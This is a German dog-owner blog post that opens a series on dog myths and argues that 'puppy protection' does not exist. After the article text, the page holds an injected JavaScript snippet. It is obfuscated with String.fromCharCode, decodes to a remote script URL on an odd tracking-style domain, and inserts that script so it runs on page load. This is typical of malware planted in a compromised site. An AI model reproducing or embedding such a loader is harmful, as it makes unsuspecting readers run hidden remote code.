Hallo und herzlich willkommen zu meinem Blog

Hallo und herzlich willkommen zu meinem Blog

Hier werde ich etwa alle 6 Wochen Themen rund um den Hund ansprechen.

Ich werde die Themen hier so beschreiben, wie ich sie sehe.

Mein erstes Thema wird sein „Die Märchen in der Hundewelt“. Es ist manchmal kaum zu glauben, was für Märchen im Umlauf sind, was unsere Hunde betrifft. Hier mal ein paar Beispiele:

  • Mein Welpe hat doch noch Welpenschutz.
  • Rohes Fleisch macht den Hund aggressiv.
  • Es ist respektlos, wenn der Hund seinen Halter oder Menschen anknurrt.
  • Mein Hund ist dominant.
  • Wenn ich meinem Hund Grenzen setze, vertraut er mir nicht mehr.
  • Reine positive ist die beste Erziehungsmethode.

Ich könnte die Liste jetzt noch unendlich fortsetzten. Nach und nach, werde ich hier in meinem Blog auf diese Themen zurückkommen.

Heute fange ich einfach einmal mit dem sogenannten Welpenschutz an: Als ich meine Hündin „Jacky“  (damals 10 Wochen alt) bei einem Bauern abgeholt habe, musste ich schon schwer schlucken, als ich sah, wie die erwachsenen Hunde (Tanten, Mutter) mit den Welpen umgegangen sind. Insgesamt waren noch 6 Welpen, und noch 4 erwachsene Hündinnen dort. Als wir angekommen sind, war die Aufregung natürlich sehr groß. Die Welpen sind an den Hündinnen hochgesprungen, sind hin und her gerannt, haben untereinander gespielt und immer wieder die Nähe eines erwachsenen Hundes gesucht. Nur wollten die erwachsenen Hunde mit dem Welpen in dem Moment, nichts zu tun haben. Und das, haben sie den Welpen sehr eindeutig gezeigt. Mit Drohen, Anknurren, Zähne fletschen, bis hin zum Schnauzgriff. Es sah und hörte sich schon sehr aggressiv an und die Welpen haben auch herzzerreißend gequietscht „aber es wurde kein einziger Welpe verletzt“.

Strafe muss halt manchmal sein, aber es wird keine Gewalt angewendet.

Sollte der Welpe aber genau das gleiche „Verhalten“ bei einem fremden Hund zeigen, könnte das ganz anders ausgehen. Und genau darauf kommt es an: „auf das Verhalten“. Deshalb sollten Sie mit Ihrem Welpen bei der  Begegnung mit einem fremden Hund, immer vorsichtig sein. Aufregung (was wir meist als Freude sehen) oder Distanzlosigkeit, wird unter fremden Hunden normalerweise sofort mit Zurechtweisung bestraft. Auch wenn es für sie so aussieht, als wenn der Welpe nur spielen wollte. Dann kommt meist der Spruch „Mein Hund ist doch noch ein Welpe und steht unter Welpenschutz“. Dazu muss ich leider sagen „Nein, steht er nicht.“  Den sogenannten Welpenschutz gibt es nicht.

Schon gar nicht bei fremden Hunden.

var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}